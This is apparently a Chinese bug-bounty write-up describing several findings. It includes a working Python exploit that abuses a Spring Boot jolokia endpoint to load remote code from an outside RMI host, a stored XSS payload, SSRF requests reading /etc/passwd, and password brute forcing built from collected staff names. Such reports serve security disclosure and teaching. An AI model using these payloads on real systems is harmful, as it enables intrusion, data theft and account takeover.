无语死啦,都是一些正常操作,没有思路,无脑挖就好了
发现特征是spring的站,然后就扫了一下目录/actuator/jolokia,有这个目录,然后搜索一下里面的关键词
应该是可以rce的
用一下不知道从哪找到的poc
import requests
url = 'http://url/actuator/jolokia'
create_realm = {
"mbean": "Tomcat:type=MBeanFactory",
"type": "EXEC",
"operation": "createJNDIRealm",
"arguments": ["Tomcat:type=Engine"]
}
wirte_factory = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "contextFactory",
"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
write_url = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": "rmi://oudeknxjnd.dnstunnel.run:1389/Evil"
}
stop = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "stop",
"arguments": []
}
start = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "start",
"arguments": []
}
flow = [create_realm, wirte_factory, write_url, stop, start]
for i in flow:
print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
r = requests.post(url, json=i)
r.json()
print(r.status_code)
然后打他
dnslog收到响应
给的钱不多。
发现某个未授权的站,然后经过测试有存储xss还有一个ssrf
直接插进去就好
"><script>alert(1)</script>
然后在找的时候发现一处
https://url/data/fileDownload?link=
第一反应是ssrf
发现dnslog是可以请求的,而且这个是请求之后,会把获取到的东西全部下载下来。
看来是支持http协议的
https://url/data/fileDownload?link=http://www.baidu.com
下载了html源码,全回显。
又测试了一下file协议
https://url/data/fileDownload?link=file:///etc/passwd
界面是ant design写的,试试找未授权的接口或者尝试账号密码爆破。
通过urlfind是找到了几个未授权接口的,但是都没啥用,需要构造参数,构造半天没构造出来,就先放一边。
然后想着爆破密码,之前挖这家,收集了一些人的名字信息,以及邮箱信息,加上爆破弱口令失败,本来都想放弃了,但是刚好在逛github发现了这个
https://github.com/zgjx6/SocialEngineeringDictionaryGenerator
也就在正经攻防中会用到,平常挖src,到密码这我都是放弃的,索性就试一下。然后根据已知的信息,生成了一堆密码
类似这种,不过我加了一些特殊符号。
然后用yakit的fuzz功能,跑出密码@姓名+工号@
成功登录
其实也算是捡漏了。这家src统一密码管理,之前有个漏洞信息泄露,获取到一些密码都是a-zA-Z0-9混合,然后10位数。
往期文章推荐